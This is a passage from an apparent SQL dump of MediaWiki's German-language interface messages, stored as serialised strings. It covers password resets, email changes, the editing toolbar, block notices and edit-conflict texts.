deaktiviert.\";'),('de','messages:passwordreset-emaildisabled','s:57:\"Die E-Mail-Funktionen wurden auf diesem Wiki deaktiviert.\";'),('de','messages:passwordreset-username','s:13:\"Benutzername:\";'),('de','messages:passwordreset-domain','s:7:\"Domain:\";'),('de','messages:passwordreset-capture','s:29:\"Die E-Mail-Nachricht ansehen?\";'),('de','messages:passwordreset-capture-help','s:143:\"Wenn du dieses Kästchen ankreuzt, wird die E-Mail-Nachricht mit dem temporären Passwort sowohl dir angezeigt als auch dem Benutzer zugesandt.\";'),('de','messages:passwordreset-email','s:15:\"E-Mail-Adresse:\";'),('de','messages:passwordreset-emailtitle','s:43:\"Benutzerkontoinformationen auf {{SITENAME}}\";'),('de','messages:passwordreset-emailtext-ip','s:687:\"Jemand mit der IP-Adresse $1, wahrscheinlich du selbst, hat eine Zurücksetzung deines\nPassworts bei {{SITENAME}} angefordert ($4). {{PLURAL:$3|Das folgende Benutzerkonto ist|Die folgenden Benutzerkonten sind}}\nmit dieser E-Mail-Adresse verknüpft:\n\n$2\n\n{{PLURAL:$3|Dieses temporäre Passwort läuft|Diese temporären Passwörter laufen}} innerhalb von {{PLURAL:$5|einem Tag|$5 Tagen}} ab.\nDu solltest dich anmelden und ein neues Passwort vergeben. Falls jemand anderes diese\nAnfrage getätigt hat oder du dich wieder an dein ursprüngliches Passwort erinnern kannst und es nicht länger\nändern möchtest, kannst du diese Nachricht ignorieren und weiterhin dein altes\nPasswort benutzen.\";'),('de','messages:passwordreset-emailtext-user','s:652:\"Benutzer $1 bei {{SITENAME}} hat eine Zurücksetzung deines Passworts bei {{SITENAME}} angefordert ($4). {{PLURAL:$3|Das folgende Benutzerkonto ist|Die folgenden Benutzerkonten sind}} mit dieser E-Mail-Adresse verknüpft:\n\n$2\n\n{{PLURAL:$3|Dieses temporäre Passwort läuft|Diese temporären Passwörter laufen}} innerhalb von {{PLURAL:$5|einem Tag|$5 Tagen}} ab. Du solltest dich anmelden und ein neues Passwort vergeben. Falls jemand anderes diese Anfrage getätigt hat oder du dich wieder an dein ursprüngliches Passwort erinnern kannst und es nicht ändern möchtest, kannst du diese Nachricht ignorieren und weiterhin dein altes Passwort benutzen.\";'),('de','messages:passwordreset-emailelement','s:41:\"Benutzername: $1\nTemporäres Passwort: $2\";'),('de','messages:passwordreset-emailsent','s:51:\"Eine Passwortzurücksetzungs-E-Mail wurde versandt.\";'),('de','messages:passwordreset-emailsent-capture','s:77:\"Eine Passwortzurücksetzungs-E-Mail wurde versandt, die unten angezeigt wird.\";'),('de','messages:passwordreset-emailerror-capture','s:156:\"Die unten angezeigte Passwortzurücksetzungs-E-Mail wurde generiert, allerdings ist der Versand an {{GENDER:$2|den Benutzer|die Benutzerin}} gescheitert: $1\";'),('de','messages:changeemail','s:22:\"E-Mail-Adresse ändern\";'),('de','messages:changeemail-text','s:143:\"Fülle dieses Formular vollständig aus, um deine E-Mail-Adresse zu ändern. Du musst dein Passwort angeben, um diese Änderung zu bestätigen.\";'),('de','messages:changeemail-no-info','s:73:\"Du musst angemeldet sein, um direkt auf diese Seite zugreifen zu können.\";'),('de','messages:changeemail-oldemail','s:24:\"Aktuelle E-Mail-Adresse:\";'),('de','messages:changeemail-newemail','s:20:\"Neue E-Mail-Adresse:\";'),('de','messages:changeemail-none','s:7:\"(keine)\";'),('de','messages:changeemail-password','s:27:\"Dein {{SITENAME}}-Passwort:\";'),('de','messages:changeemail-submit','s:22:\"E-Mail-Adresse ändern\";'),('de','messages:changeemail-throttled','s:91:\"Du hast zu viele Anmeldeversuche unternommen.\nBitte warte $1, bevor du es erneut versuchst.\";'),('de','messages:resettokens','s:20:\"Tokens zurücksetzen\";'),('de','messages:resettokens-text','s:268:\"Du kannst Tokens zurücksetzen, welche dir den Zugriff auf bestimmte private Daten ermöglichen, die mit deinem Benutzerkonto hier verknüpft sind.\n\nDu solltest dies nur machen, wenn du die Tokens versehentlich mit jemandem geteilt hast oder dein Konto gefährdet ist.\";'),('de','messages:resettokens-no-tokens','s:39:\"Es gibt keine Tokens zum Zurücksetzen.\";'),('de','messages:resettokens-legend','s:20:\"Tokens zurücksetzen\";'),('de','messages:resettokens-tokens','s:7:\"Tokens:\";'),('de','messages:resettokens-token-label','s:23:\"$1 (aktueller Wert: $2)\";'),('de','messages:resettokens-watchlist-token','s:110:\"Token für den Webfeed (Atom/RSS) der [[Special:Watchlist|Änderungen an Seiten auf deiner Beobachtungsliste]]\";'),('de','messages:resettokens-done','s:22:\"Tokens zurückgesetzt.\";'),('de','messages:resettokens-resetbutton','s:26:\"Ausgewählte Token ändern\";'),('de','messages:bold_sample','s:11:\"Fetter Text\";'),('de','messages:bold_tip','s:11:\"Fetter Text\";'),('de','messages:italic_sample','s:13:\"Kursiver Text\";'),('de','messages:italic_tip','s:13:\"Kursiver Text\";'),('de','messages:link_sample','s:9:\"Link-Text\";'),('de','messages:link_tip','s:13:\"Interner Link\";'),('de','messages:extlink_sample','s:32:\"http://www.example.com Link-Text\";'),('de','messages:extlink_tip','s:32:\"Externer Link (http:// beachten)\";'),('de','messages:headline_sample','s:20:\"Ebene-2-Überschrift\";'),('de','messages:headline_tip','s:20:\"Ebene-2-Überschrift\";'),('de','messages:nowiki_sample','s:34:\"Unformatierten Text hier einfügen\";'),('de','messages:nowiki_tip','s:19:\"Unformatierter Text\";'),('de','messages:image_sample','s:12:\"Beispiel.jpg\";'),('de','messages:image_tip','s:9:\"Dateilink\";'),('de','messages:media_sample','s:12:\"Beispiel.ogg\";'),('de','messages:media_tip','s:16:\"Mediendatei-Link\";'),('de','messages:sig_tip','s:30:\"Deine Signatur mit Zeitstempel\";'),('de','messages:hr_tip','s:37:\"Horizontale Linie (sparsam verwenden)\";'),('de','messages:summary','s:16:\"Zusammenfassung:\";'),('de','messages:subject','s:8:\"Betreff:\";'),('de','messages:minoredit','s:35:\"Nur Kleinigkeiten wurden verändert\";'),('de','messages:watchthis','s:22:\"Diese Seite beobachten\";'),('de','messages:savearticle','s:15:\"Seite speichern\";'),('de','messages:preview','s:8:\"Vorschau\";'),('de','messages:showpreview','s:15:\"Vorschau zeigen\";'),('de','messages:showdiff','s:18:\"Änderungen zeigen\";'),('de','messages:blankarticle','s:155:\"Warnung: Die Seite, die du erstellst, ist leer.\nWenn du erneut auf „{{int:savearticle}}“ klickst, wird die Seite ohne Inhalt erstellt.\";'),('de','messages:anoneditwarning','s:325:\"Warnung: Du bist nicht angemeldet. Deine IP-Adresse wird öffentlich sichtbar, falls du Bearbeitungen durchführst. Wenn du dich [$1 anmeldest] oder [$2 ein Benutzerkonto erstellst], werden deine Bearbeitungen zusammen mit anderen Beiträgen deinem Benutzernamen zugeordnet.\";'),('de','messages:anonpreviewwarning','s:107:\"\'\'Du bist nicht angemeldet. Beim Speichern wird deine IP-Adresse in der Versionsgeschichte aufgezeichnet.\'\'\";'),('de','messages:missingsummary','s:164:\"\'\'\'Hinweis:\'\'\' Du hast keine Zusammenfassung angegeben. Wenn du erneut auf „{{int:savearticle}}“ klickst, wird deine Änderung ohne Zusammenfassung übernommen.\";'),('de','messages:missingcommenttext','s:36:\"Dein Abschnitt enthält keinen Text.\";'),('de','messages:missingcommentheader','s:168:\"\'\'\'Achtung:\'\'\' Du hast kein Betreff/Überschrift eingegeben. Wenn du erneut auf „{{int:savearticle}}“ klickst, wird deine Bearbeitung ohne Überschrift gespeichert.\";'),('de','messages:summary-preview','s:35:\"Vorschau der Zusammenfassungszeile:\";'),('de','messages:subject-preview','s:35:\"Vorschau der Zusammenfassungszeile:\";'),('de','messages:blockedtitle','s:21:\"Benutzer ist gesperrt\";'),('de','messages:blockedtext','s:721:\"\'\'\'Dein Benutzername oder deine IP-Adresse wurde gesperrt.\'\'\'\n\nDie Sperrung wurde vom Administrator $1 durchgeführt.\nAls Grund wurde \'\'$2\'\' angegeben.\n\n* Beginn der Sperre: $8\n* Ende der Sperre: $6\n* Sperre betrifft: $7\n\nDu kannst $1 oder einen der anderen [[{{MediaWiki:Grouppage-sysop}}|Administratoren]] kontaktieren, um über die Sperre zu diskutieren.\nDu kannst die „E-Mail an diesen Benutzer“-Funktion nicht nutzen, solange keine gültige E-Mail-Adresse in deinen [[Special:Preferences|Benutzerkonto-Einstellungen]] eingetragen ist oder diese Funktion für dich gesperrt wurde.\nDeine aktuelle IP-Adresse ist $3 und die Sperrkennung lautet $5.\nBitte füge alle Informationen jeder Anfrage hinzu, die du stellst.\";'),('de','messages:autoblockedtext','s:722:\"Deine IP-Adresse wurde automatisch gesperrt, da sie von einem anderen Benutzer genutzt wurde, der von $1 gesperrt wurde.\nAls Grund wurde angegeben:\n\n:\'\'$2\'\'\n\n* Beginn der Sperre: $8\n* Ende der Sperre: $6\n* Sperre betrifft: $7\n\nDu kannst $1 oder einen der anderen [[{{MediaWiki:Grouppage-sysop}}|Administratoren]] kontaktieren, um über die Sperre zu diskutieren.\n\nDu kannst die „E-Mail an diesen Benutzer“-Funktion nicht nutzen, solange keine gültige E-Mail-Adresse in deinen [[Special:Preferences|Benutzerkonto-Einstellungen]] eingetragen ist oder diese Funktion für dich gesperrt wurde.\n\nDeine aktuelle IP-Adresse ist $3, und die Sperr-ID ist $5.\nBitte füge alle Informationen jeder Anfrage hinzu, die du stellst.\";'),('de','messages:blockednoreason','s:27:\"keine Begründung angegeben\";'),('de','messages:whitelistedittext','s:50:\"Du musst dich $1, um Seiten bearbeiten zu können.\";'),('de','messages:confirmedittext','s:180:\"Du musst deine E-Mail-Adresse erst bestätigen, bevor du Bearbeitungen durchführen kannst. Bitte ergänze und bestätige deine E-Mail in den [[Special:Preferences|Einstellungen]].\";'),('de','messages:nosuchsectiontitle','s:24:\"Abschnitt nicht gefunden\";'),('de','messages:nosuchsectiontext','s:154:\"Du hast versucht, einen Abschnitt zu bearbeiten, der nicht existiert.\nVermutlich wurde er verschoben oder gelöscht, nachdem du die Seite aufgerufen hast.\";'),('de','messages:loginreqtitle','s:22:\"Anmeldung erforderlich\";'),('de','messages:loginreqlink','s:8:\"anmelden\";'),('de','messages:loginreqpagetext','s:45:\"Du musst dich $1, um Seiten lesen zu können.\";'),('de','messages:accmailtitle','s:25:\"Passwort wurde verschickt\";'),('de','messages:accmailtext','s:188:\"Ein zufällig generiertes Passwort für [[User talk:$1|$1]] wurde an $2 versandt. Es kann auf der Seite \'\'[[Special:ChangePassword|Passwort ändern]]\'\' nach der Anmeldung geändert werden.\";'),('de','messages:newarticle','s:5:\"(Neu)\";'),('de','messages:newarticletext','s:302:\"Du bist einem Link zu einer Seite gefolgt, die nicht vorhanden ist.\nUm diese Seite anzulegen, trage deinen Text in das untenstehende Bearbeitungsfeld ein (weitere Informationen auf der [$1 Hilfeseite]).\nSofern du fälschlicherweise hier bist, klicke auf die Schaltfläche \'\'\'Zurück\'\'\' deines Browsers.\";'),('de','messages:anontalkpagetext','s:583:\"----\'\'Diese Seite dient dazu, einem nicht angemeldeten Benutzer Nachrichten zu hinterlassen. Es wird seine IP-Adresse zur Identifizierung verwendet. IP-Adressen können von mehreren Benutzern gemeinsam verwendet werden. Wenn du mit den Kommentaren auf dieser Seite nichts anfangen kannst, richten sie sich vermutlich an einen früheren Inhaber deiner IP-Adresse und du kannst sie ignorieren. Du kannst dir auch ein [[Special:UserLogin/signup|Benutzerkonto erstellen]] oder dich [[Special:UserLogin|anmelden]], um künftig Verwechslungen mit anderen anonymen Benutzern zu vermeiden.\'\'\";'),('de','messages:noarticletext','s:349:\"Diese Seite enthält momentan noch keinen Text.\nDu kannst sie [{{fullurl:{{FULLPAGENAME}}|action=edit}} bearbeiten],\nihren Titel auf anderen Seiten [[Special:Search/{{PAGENAME}}|suchen]]\noder die zugehörigen [{{fullurl:{{#special:Log}}|page={{FULLPAGENAMEE}}}} Logbücher betrachten].\";'),('de','messages:noarticletext-nopermission','s:314:\"Diese Seite enthält momentan noch keinen Text, du bist auch nicht berechtigt diese Seite zu erstellen.\nDu kannst ihren Titel auf anderen Seiten [[Special:Search/{{PAGENAME}}|suchen]] oder die zugehörigen [{{fullurl:{{#special:Log}}|page={{FULLPAGENAMEE}}}} Logbücher betrachten].\";'),('de','messages:missing-revision','s:328:\"Die Version $1 der Seite namens „{{FULLPAGENAME}}“ ist nicht vorhanden.\n\nDieser Fehler wird normalerweise von einem veralteten Link zur Versionsgeschichte einer Seite verursacht, die zwischenzeitlich gelöscht wurde.\nEinzelheiten sind im [{{fullurl:{{#Special:Log}}/delete|page={{FULLPAGENAMEE}}}} Lösch-Logbuch] einsehbar.\";'),('de','messages:userpage-userdoesnotexist','s:134:\"Das Benutzerkonto „$1“ ist nicht vorhanden. Bitte prüfe, ob du diese Seite wirklich erstellen/bearbeiten willst.\";'),('de','messages:userpage-userdoesnotexist-view','s:47:\"Das Benutzerkonto „$1“ ist nicht vorhanden.\";'),('de','messages:blocked-notice-logextract','s:158:\"{{GENDER:$1|Dieser Benutzer|Diese Benutzerin|Dieser Benutzer}} ist zurzeit gesperrt.\nZur Information folgt ein aktueller Auszug aus dem Benutzersperr-Logbuch:\";'),('de','messages:clearyourcache','s:594:\"\'\'\'Hinweis:\'\'\' Leere nach dem Speichern den Browser-Cache, um die Änderungen sehen zu können.\n* \'\'\'Firefox/Safari:\'\'\' \'\'Umschalttaste\'\' drücken und gleichzeitig \'\'Aktualisieren\'\' anklicken oder entweder \'\'Strg+F5\'\' oder \'\'Strg+R\'\' (\'\'⌘+R\'\' auf dem Mac) drücken\n* \'\'\'Google Chrome:\'\'\' \'\'Umschalttaste+Strg+R\'\' (\'\'⌘+Umschalttaste+R\'\' auf dem Mac) drücken\n* \'\'\'Internet Explorer:\'\'\' \'\'Strg+F5\'\' drücken oder \'\'Strg\'\' drücken und gleichzeitig \'\'Aktualisieren\'\' anklicken\n* \'\'\'Opera:\'\'\' \'\'Extras → Internetspuren löschen … → Individuelle Auswahl → Den kompletten Cache löschen\'\'\";'),('de','messages:usercssyoucanpreview','s:104:\"\'\'\'Tipp:\'\'\' Benutze den „{{int:showpreview}}“-Button, um dein neues CSS vor dem Speichern zu testen.\";'),('de','messages:userjsyoucanpreview','s:111:\"\'\'\'Tipp:\'\'\' Benutze den „{{int:showpreview}}“-Button, um dein neues JavaScript vor dem Speichern zu testen.\";'),('de','messages:usercsspreview','s:112:\"\'\'\'Beachte, dass du nur eine Vorschau deines Benutzer-CSS betrachtest.\'\'\'\n\'\'\'Es wurde noch nicht gespeichert!\'\'\'\";'),('de','messages:userjspreview','s:120:\"\'\'\'Beachte, dass du nur eine Vorschau deines Benutzer-JavaScripts betrachtest.\'\'\'\n\'\'\'Es wurde noch nicht gespeichert!\'\'\'\";'),('de','messages:sitecsspreview','s:103:\"\'\'\'Beachte, dass du nur eine Vorschau dieses CSS betrachtest.\'\'\'\n\'\'\'Es wurde noch nicht gespeichert!\'\'\'\";'),('de','messages:sitejspreview','s:110:\"\'\'\'Beachte, dass du nur eine Vorschau dieses JavaScript betrachtest.\'\'\'\n\'\'\'Es wurde noch nicht gespeichert!\'\'\'\";'),('de','messages:userinvalidcssjstitle','s:274:\"\'\'\'Achtung:\'\'\' Die Benutzeroberfläche „$1“ existiert nicht. Bedenke, dass benutzerspezifische .css- und .js-Seiten mit einem Kleinbuchstaben anfangen müssen, also beispielsweise \'\'{{ns:user}}:Mustermann/vector.css\'\' an Stelle von \'\'{{ns:user}}:Mustermann/Vector.css\'\'.\";'),('de','messages:updated','s:11:\"(Geändert)\";'),('de','messages:note','s:14:\"\'\'\'Hinweis:\'\'\'\";'),('de','messages:previewnote','s:73:\"\'\'\'Dies ist nur eine Vorschau.\'\'\'\nDie Seite wurde noch nicht gespeichert!\";'),('de','messages:continue-editing','s:26:\"Zum Bearbeitungsfeld gehen\";'),('de','messages:previewconflict','s:114:\"Diese Vorschau gibt den Inhalt des oberen Textfeldes wieder. So wird die Seite aussehen, wenn du jetzt speicherst.\";'),('de','messages:session_fail_preview','s:305:\"\'\'\'Deine Bearbeitung konnte nicht gespeichert werden, da Sitzungsdaten verloren gegangen sind.\nBitte versuche es erneut, indem du unter der folgenden Textvorschau nochmals auf „Seite speichern“ klickst.\nSollte das Problem bestehen bleiben, [[Special:UserLogout|melde dich ab]] und danach wieder an.\'\'\'\";'),('de','messages:session_fail_preview_html','s:450:\"\'\'\'Deine Bearbeitung konnte nicht gespeichert werden, da Sitzungsdaten verloren gegangen sind.\'\'\'\n\n\'\'Da in {{SITENAME}} das Speichern von reinem HTML aktiviert ist, wurde die Vorschau ausgeblendet, um JavaScript-Attacken vorzubeugen.\'\'\n\n\'\'\'Bitte versuche es erneut, indem du unter der folgenden Textvorschau nochmals auf „Seite speichern“ klickst.\nSollte das Problem bestehen bleiben, [[Special:UserLogout|melde dich ab]] und danach wieder an.\'\'\'\";'),('de','messages:token_suffix_mismatch','s:260:\"\'\'\'Deine Bearbeitung wurde zurückgewiesen, da dein Browser Zeichen im Bearbeiten-Token verstümmelt hat.\nEine Speicherung kann den Seiteninhalt zerstören. Dies geschieht bisweilen durch die Benutzung eines anonymen Proxy-Dienstes, der fehlerhaft arbeitet.\'\'\'\";'),('de','messages:edit_form_incomplete','s:164:\"\'\'\'Der Inhalt des Bearbeitungsformulars hat den Server nicht vollständig erreicht. Bitte prüfe deine Bearbeitungen auf Vollständigkeit und versuche es erneut.\'\'\'\";'),('de','messages:editing','s:23:\"Bearbeiten von „$1“\";'),('de','messages:creating','s:22:\"Erstellen von „$1“\";'),('de','messages:editingsection','s:35:\"Bearbeiten von „$1“ (Abschnitt)\";'),('de','messages:editingcomment','s:41:\"Bearbeiten von „$1“ (Neuer Abschnitt)\";'),('de','messages:editconflict','s:24:\"Bearbeitungskonflikt: $1\";'),('de','messages:explainconflict','s:371:\"Jemand anders hat diese Seite geändert, nachdem du angefangen hast, sie zu bearbeiten.\nDas obere Textfeld enthält den aktuellen Bearbeitungsstand der Seite.\nDas untere Textfeld enthält deine Änderungen.\nBitte füge deine Änderungen in das obere Textfeld ein.\n\'\'\'Nur\'\'\' der Inhalt des oberen Textfeldes wird gespeichert, wenn du auf „{{int:savearticle}}“ klickst.\";'),('de','messages:yourtext','s:9:\"Dein Text\";'),('de','messages:storedversion','s:20:\"Gespeicherte Version\";'),('de','messages:nonunicodebrowser','s:252:\"\'\'\'Achtung: Dein Browser kann Unicode-Zeichen nicht richtig verarbeiten.\'\'\' Es wird eine Hilfsroutine eingesetzt, um dir zu erlauben, Seiten sicher zu bearbeiten: Nicht-ASCII-Zeichen werden dabei im Bearbeitungsfenster als hexadezimale Codes angezeigt.\";'),('de','messages:editingold','s:133:\"\'\'\'Achtung: Du bearbeitest eine alte Version dieser Seite. Sofern du sie speicherst, werden alle neueren Versionen überschrieben.\'\'\'\";'),('de','messages:yourdiff','s:12:\"Unterschiede\";'),('de','messages:copyrightwarning','s:717:\"\'\'\'Bitte kopiere keine Webseiten, die nicht deine eigenen sind, benutze keine urheberrechtlich geschützten Werke ohne Erlaubnis des Urhebers!\'\'\'
                                                                \nDu gibst uns hiermit deine Zusage, dass du den Text \'\'\'selbst verfasst\'\'\' hast, dass der Text Allgemeingut \'\'\'(public domain)\'\'\' ist, oder dass der \'\'\'Urheber\'\'\' seine \'\'\'Zustimmung\'\'\' gegeben hat. Falls dieser Text bereits woanders veröffentlicht wurde, weise bitte auf der Diskussionsseite darauf hin.\nBitte beachte, dass alle {{SITENAME}}-Beiträge automatisch unter der „$2“ stehen (siehe $1 für Einzelheiten). Falls du nicht möchtest, dass deine Arbeit hier von anderen verändert und verbreitet wird, dann klicke nicht auf „Seite speichern“.\";'),('de','messages:copyrightwarning2','s:477:\"Bitte beachte, dass alle Beiträge zu {{SITENAME}} von anderen Mitwirkenden bearbeitet, geändert oder gelöscht werden können.\nReiche hier keine Texte ein, falls du nicht willst, dass diese ohne Einschränkung geändert werden können.\n\nDu bestätigst hiermit auch, dass du diese Texte selbst geschrieben hast oder diese von einer gemeinfreien Quelle kopiert hast\n(weitere Einzelheiten unter $1). \'\'\'ÜBERTRAGE OHNE GENEHMIGUNG KEINE URHEBERRECHTLICH GESCHÜTZTEN INHALTE!\'\'\'\";'),('de','messages:longpageerror','s:225:\"\'\'\'Fehler: Der Text, den du zu speichern versuchst, ist {{PLURAL:$1|ein Kilobyte|$1 Kilobyte}} groß. Dies ist größer als das erlaubte Maximum von {{PLURAL:$2|ein Kilobyte|$2 Kilobyte}}.\'\'\'\nEr kann nicht gespeichert werden.\";'),('de','messages:readonlywarning','s:285:\"\'\'\'Achtung: Die Datenbank wurde für Wartungsarbeiten gesperrt, so dass deine Änderungen derzeit nicht gespeichert werden können.\nSichere den Text bitte lokal auf deinem Computer und versuche zu einem späteren Zeitpunkt, die Änderungen zu übertragen.\'\'\'\n\nGrund für die Sperre: $1\";'),('de','messages:protectedpagewarning','s:163:\"\'\'\'Achtung: Diese Seite wurde geschützt. Nur Benutzer mit Administratorrechten können die Seite bearbeiten.\'\'\'\nZur Information folgt der aktuelle Logbucheintrag:\";'),('de','messages:semiprotectedpagewarning','s:155:\"\'\'\'Halbsperrung:\'\'\' Die Seite wurde so geschützt, dass nur registrierte Benutzer diese ändern können.\nZur Information folgt der aktuelle Logbucheintrag:\";'),('de','messages:cascadeprotectedwarning','s:269:\"\'\'\'Achtung:\'\'\' Diese Seite wurde so geschützt, dass sie nur durch Benutzer mit Administratorrechten bearbeitet werden kann. Sie ist in die {{PLURAL:$1|folgende Seite|folgenden Seiten}} eingebunden, die mittels der Kaskadensperroption geschützt {{PLURAL:$1|ist|sind}}:\";'),('de','messages:titleprotectedwarning','s:207:\"\'\'\'Achtung: Die Seitenerstellung wurde so geschützt, dass nur Benutzer mit [[Special:ListGroupRights|speziellen Rechten]] diese Seite erstellen können.\'\'\'\nZur Information folgt der aktuelle Logbucheintrag:\";'),('de','messages:templatesused','s:92:\"{{PLURAL:$1|Die folgende Vorlage wird|Folgende Vorlagen werden}} auf dieser Seite verwendet:\";'),('de','messages:templatesusedpreview','s:101:\"{{PLURAL:$1|Die folgende Vorlage wird|Folgende Vorlagen werden}} von dieser Seitenvorschau verwendet:\";'),('de','messages:templatesusedsection','s:95:\"{{PLURAL:$1|Die folgende Vorlage wird|Folgende Vorlagen werden}} in diesem Abschnitt verwendet:\";'),('de','messages:template-protected','s:19:\"(schreibgeschützt)\";'),('de','messages:template-semiprotected','s:56:\"(schreibgeschützt für unangemeldete und neue Benutzer)\";'),('de','messages:hiddencategories','s:93:\"Diese Seite ist Mitglied von {{PLURAL:$1|1 versteckter Kategorie|$1 versteckten Kategorien}}:\";'),('de','messages:edittools','s:107:\"\";'),('de','messages:nocreatetext','s:143:\"Auf {{SITENAME}} wurde das Erstellen neuer Seiten eingeschränkt. Du kannst bestehende Seiten ändern oder dich [[Special:UserLogin|anmelden]].\";'),('de','messages:nocreate-loggedin','s:82:\"Du hast nicht die erforderliche Berechtigung, um neue Seiten erstellen zu können.\";'),('de','messages:sectioneditnotsupported-title','s:55:\"Die Bearbeitung von Abschnitten wird nicht unterstützt\";'),('de','messages:sectioneditnotsupported-text','s:85:\"Die Bearbeitung von Abschnitten wird auf dieser Bearbeitungsseite nicht unterstützt.\";'),('de','messages:permissionserrors','s:19:\"Berechtigungsfehler\";'),('de','messages:permissionserrorstext','s:79:\"Du bist nicht berechtigt, die Aktion auszuführen. {{PLURAL:$1|Grund|Gründe}}:\";'),('de','messages:permissionserrorstext-withaction','s:90:\"Du bist aus {{PLURAL:$1|dem folgenden Grund|den folgenden Gründen}} nicht berechtigt, $2:\";'),('de','messages:recreate-moveddeleted-warn','s:283:\"\'\'\'Achtung: Du erstellst eine Seite, die bereits früher gelöscht wurde.\'\'\'\n\nBitte prüfe sorgfältig, ob die erneute Seitenerstellung den Richtlinien entspricht.\nZu deiner Information folgt das Lösch- und Verschiebungs-Logbuch mit der Begründung für die vorhergehende Löschung:\";'),('de','messages:moveddeleted-notice','s:102:\"Diese Seite wurde gelöscht. Zur Information folgt das Lösch- und Verschiebungs-Logbuch dieser Seite.\";'),('de','messages:log-fulllog','s:29:\"Alle Logbucheinträge ansehen\";'),('de','messages:edit-hook-aborted','s:75:\"Die Bearbeitung wurde ohne Erklärung durch eine Schnittstelle abgebrochen.\";'),('de','messages:edit-gone-missing','s:76:\"Die Seite konnte nicht aktualisiert werden.\nSie wurde anscheinend gelöscht.\";'),('de','messages:edit-conflict','s:21:\"Bearbeitungskonflikt.\";'),('de','messages:edit-no-change','s:84:\"Deine Bearbeitung wurde ignoriert, da keine Änderung an dem Text vorgenommen wurde.\";'),('de','messages:postedit-confirmation-created','s:25:\"Die Seite wurde erstellt.\";'),('de','messages:postedit-confirmation-restored','s:34:\"Die Seite wurde wiederhergestellt.\";'),('de','messages:postedit-confirmation-saved','s:36:\"Deine Bearbeitung wurde gespeichert.\";'),('de','messages:edit-already-exists','s:74:\"Die neue Seite konnte nicht erstellt werden, da sie bereits vorhanden ist.\";'),('de','messages:defaultmessagetext','s:12:\"Standardtext\";'),('de','messages:content-failed-to-parse','s:55:\"Parsen des Inhalts $2 für Modell $1 fehlgeschlagen: $3\";'),('de','messages:invalid-content-data','s:23:\"Ungültige Inhaltsdaten\";'),('de','messages:content-not-allowed-here','s:58:\"Der Inhalt „$1“ ist auf der Seite [[$2]] nicht erlaubt\";'),('de','messages:editwarning-warning','s:219:\"Das Verlassen dieser Seite kann dazu führen, dass deine Änderungen verloren gehen.\nWenn du angemeldet bist, kannst du das Anzeigen dieser Warnung im Bereich „{{int:prefs-editing}}“ deiner Einstellungen abschalten.\";'),('de','messages:editpage-notsupportedcontentformat-title','s:41:\"Das Inhaltsformat wird nicht unterstützt\";'),('de','messages:editpage-notsupportedcontentformat-text','s:66:\"Das Inhaltsformat $1 wird vom Inhaltsmodell $2 nicht unterstützt.\";'),('de','messages:content-model-wikitext','s:8:\"Wikitext\";'),('de','messages:content-model-text','s:8:\"Klartext\";'),('de','messages:content-model-javascript','s:10:\"JavaScript\";'),('de','messages:content-model-css','s:3:\"CSS\";'),('de','messages:expensive-parserfunction-warning','s:211:\"\'\'\'Achtung:\'\'\' Diese Seite enthält zu viele Aufrufe aufwändiger Parserfunktionen.\n\nSie darf nicht mehr als $2 {{PLURAL:$2|Aufruf|Aufrufe}} haben, es {{PLURAL:$1|ist aktuell $1 Aufruf|sind aktuell $1 Aufrufe}}.\";'),('de','messages:expensive-parserfunction-category','s:56:\"Seiten, die aufwändige Parserfunktionen zu oft aufrufen\";'),('de','messages:post-expand-template-inclusion-warning','s:107:\"Warnung: Die Größe eingebundener Vorlagen ist zu groß, einige Vorlagen können nicht eingebunden werden.\";'),('de','messages:post-expand-template-inclusion-category','s:79:\"Seiten, in denen die maximale Größe eingebundener Vorlagen überschritten ist\";'),('de','messages:post-expand-template-argument-warning','s:143:\"\'\'\'Warnung:\'\'\' Diese Seite enthält mindestens einen Parameter in einer Vorlage, der expandiert zu groß ist. Diese Parameter werden ignoriert.\";'),('de','messages:post-expand-template-argument-category','s:41:\"Seiten mit ignorierten Vorlagenparametern\";'),('de','messages:parser-template-loop-warning','s:33:\"Vorlagenschleife entdeckt: [[$1]]\";'),('de','messages:parser-template-recursion-depth-warning','s:50:\"Vorlagenrekursionstiefengrenze überschritten ($1)\";'),('de','messages:language-converter-depth-warning','s:46:\"Sprachkonvertertiefenlimit überschritten ($1)\";'),('de','messages:node-count-exceeded-category','s:49:\"Seiten, die die Knotenanzahl überschritten haben\";'),('de','messages:node-count-exceeded-category-desc','s:51:\"Die Seite überschreitet die maximale Knotenanzahl.\";'),('de','messages:node-count-exceeded-warning','s:51:\"Die Seite hat die Knotenpunktanzahl überschritten.\";'),('de','messages:expansion-depth-exceeded-category','s:52:\"Seiten, die die Expansionstiefe überschritten haben\";'),('de','messages:expansion-depth-exceeded-category-desc','s:57:\"Die Seite überschreitet die maximale Expandierungstiefe.\";'),('de','messages:expansion-depth-exceeded-warning','s:49:\"Die Seite hat die Expansionstiefe überschritten.\";'),('de','messages:parser-unstrip-loop-warning','s:24:\"Zirkelbezug festgestellt\";'),('de','messages:parser-unstrip-recursion-limit','s:51:\"Rekursionsgrenze beim Auflösen überschritten ($1)\";'),('de','messages:converter-manual-rule-error','s:70:\"Bei der manuellen Sprachkonvertierungsregel wurde ein Fehler entdeckt.\";'),('de','messages:undo-success','s:218:\"Die Bearbeitung kann rückgängig gemacht werden.\nBitte prüfe den Vergleich unten, um sicherzustellen, dass du dies tun möchtest, und speichere dann unten deine Änderungen, um die Bearbeitung rückgängig zu machen.\";'),('de','messages:undo-failure','s:118:\"Die Änderung konnte nicht rückgängig gemacht werden, da der betroffene Abschnitt zwischenzeitlich verändert wurde.\";'),('de','messages:undo-norev','s:106:\"Die Bearbeitung konnte nicht rückgängig gemacht werden, da sie nicht vorhanden ist oder gelöscht wurde.\";'),('de','messages:undo-nochange','s:65:\"Anscheinend wurde diese Bearbeitung bereits rückgängig gemacht.\";'),('de','messages:undo-summary','s:100:\"Änderung $1 von [[Special:Contributions/$2|$2]] ([[User talk:$2|Diskussion]]) rückgängig gemacht.\";'),('de','messages:undo-summary-username-hidden','s:62:\"Änderung $1 eines versteckten Benutzers rückgängig gemacht.\";'),('de','messages:cantcreateaccounttitle','s:44:\"Das Benutzerkonto kann nicht erstellt werden\";'),('de','messages:cantcreateaccount-text','s:132:\"Die Erstellung eines Benutzerkontos von der IP-Adresse \'\'\'($1)\'\'\' aus wurde durch [[User:$3|$3]] gesperrt.\n\nGrund der Sperre: \'\'$2\'\'\";'),('de','messages:cantcreateaccount-range-text','s:190:\"Das Erstellen von Benutzerkonten von IP-Adressen im Bereich \'\'\'$1\'\'\', der deine IP-Adresse (\'\'\'$4\'\'\') enthält, wurde von [[User:$3|$3]] gesperrt.\n\nDer angegebene Grund von $3 